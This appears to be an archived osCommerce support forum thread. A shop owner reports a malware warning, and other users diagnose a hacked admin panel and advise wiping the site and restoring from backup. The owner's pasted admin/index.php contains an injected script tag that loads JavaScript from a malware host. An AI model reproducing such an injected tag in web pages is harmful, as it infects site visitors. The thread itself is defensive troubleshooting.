Thush Posted January 20, 2010 Posted January 20, 2010 Hi, Today When I try to loging to the admin pannel I got a virus wanning message below. Any one know what it is ? any help to remove the wanning? Warning: Visiting this site may harm your computer! The website at www.xxxxxxxxxx.co.uk contains elements from the site b.rtbn2.cn, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer. For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for b.rtbn2.cn. Learn more about how to protect yourself from harmful software online.
web-project Posted January 20, 2010 Posted January 20, 2010 you need to investigate the code as probably someone hacked into your oscommerce admin panel. Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here! 8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself. Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues. Any issues with oscommerce, I am here to help you.
Thush Posted January 20, 2010 Author Posted January 20, 2010 Seen a code in admin/index.php will this effect to all of my website? <?php /* $Id: $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2007 osCommerce Released under the GNU General Public License */ require('includes/application_top.php'); $languages = tep_get_languages(); $languages_array = array(); $languages_selected = DEFAULT_LANGUAGE; for ($i = 0, $n = sizeof($languages); $i < $n; $i++) { $languages_array[] = array('id' => $languages[$i]['code'], 'text' => $languages[$i]['name']); if ($languages[$i]['directory'] == $language) { $languages_selected = $languages[$i]['code']; } } ?> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html <?php echo HTML_PARAMS; ?>> <head> <meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>"> <meta name="robots" content="noindex,nofollow"> <title><?php echo TITLE; ?></title> <link rel="stylesheet" type="text/css" href="includes/stylesheet.css"> <script language="javascript" src="includes/general.js"></script> </head> <body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="SetFocus();"> <!-- header //--> <?php require(DIR_WS_INCLUDES . 'header.php'); ?> <!-- header_eof //--> <!-- body //--> <table border="0" width="100%" cellspacing="2" cellpadding="2"> <tr> <td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="1" cellpadding="1" class="columnLeft"> <!-- left_navigation //--> <?php require(DIR_WS_INCLUDES . 'column_left.php'); ?> <!-- left_navigation_eof //--> </table></td> <!-- body_text //--> <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="2" height="40"> <tr> <td class="pageHeading"><?php echo STORE_NAME; ?></td> <td class="pageHeading" align="right"><?php echo tep_draw_form('adminlanguage', FILENAME_DEFAULT, '', 'get') . tep_draw_pull_down_menu('language', $languages_array, $languages_selected, 'onChange="this.form.submit();"') . tep_hide_session_id() . '</form>'; ?></td> </tr> </table></td> </tr> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="2"> <?php $file_extension = substr($PHP_SELF, strrpos($PHP_SELF, '.')); $files = array(); if ($dir = @dir(DIR_FS_ADMIN . 'includes/modules/index')) { while ($file = $dir->read()) { if (!is_dir($module_directory . $file)) { if (substr($file, strrpos($file, '.')) == $file_extension) { $files[] = $file; } } } sort($files); $dir->close(); } $col = 0; for ($i=0, $n=sizeof($files); $i<$n; $i++) { if (file_exists(DIR_WS_LANGUAGES . $language . '/modules/index/' . $files[$i])) { include(DIR_WS_LANGUAGES . $language . '/modules/index/' . $files[$i]); } if ($col < 1) { echo ' <tr>' . "\n"; } $col++; if ($col <= 2) { echo ' <td width="50%" valign="top">' . "\n"; } include('includes/modules/index/' . $files[$i]); if ($col <= 2) { echo ' </td>' . "\n"; } if ( !isset($files[$i+1]) || ($col == 2) ) { if ( !isset($files[$i+1]) && ($col == 1) ) { echo ' <td width="50%" valign="top"> </td>' . "\n"; } $col = 0; echo ' </tr>' . "\n"; } } ?> </table></td> </tr> </table></td> </tr> </table> <!-- body_eof //--> <!-- footer //--> <?php require(DIR_WS_INCLUDES . 'footer.php'); ?> <!-- footer_eof //--> <br> <script src='http://b.rtbn2.cn/E/J.JS'></script></body> </html> <?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>
♥mdtaylorlrim Posted January 20, 2010 Posted January 20, 2010 Here it is (with http:// replaced with xxxxxx), but it is likely all over your site, not just in the one file. <script src='xxxxxxb.rtbn2.cn/E/J.JS'></script> Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...?
♥mdtaylorlrim Posted January 20, 2010 Posted January 20, 2010 Your best bet, given your reply, is to 1) wipe the site clean, and 2) restrict access to only yourself, and 3) restore from known back up, and 4) Apply all security patches in the first topic of the Security forum, and finally 5) restore access to your site. You have backups, right? Community Bootstrap Edition, Edge Avoid the most asked question. See How to Secure My Site and How do I...?
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.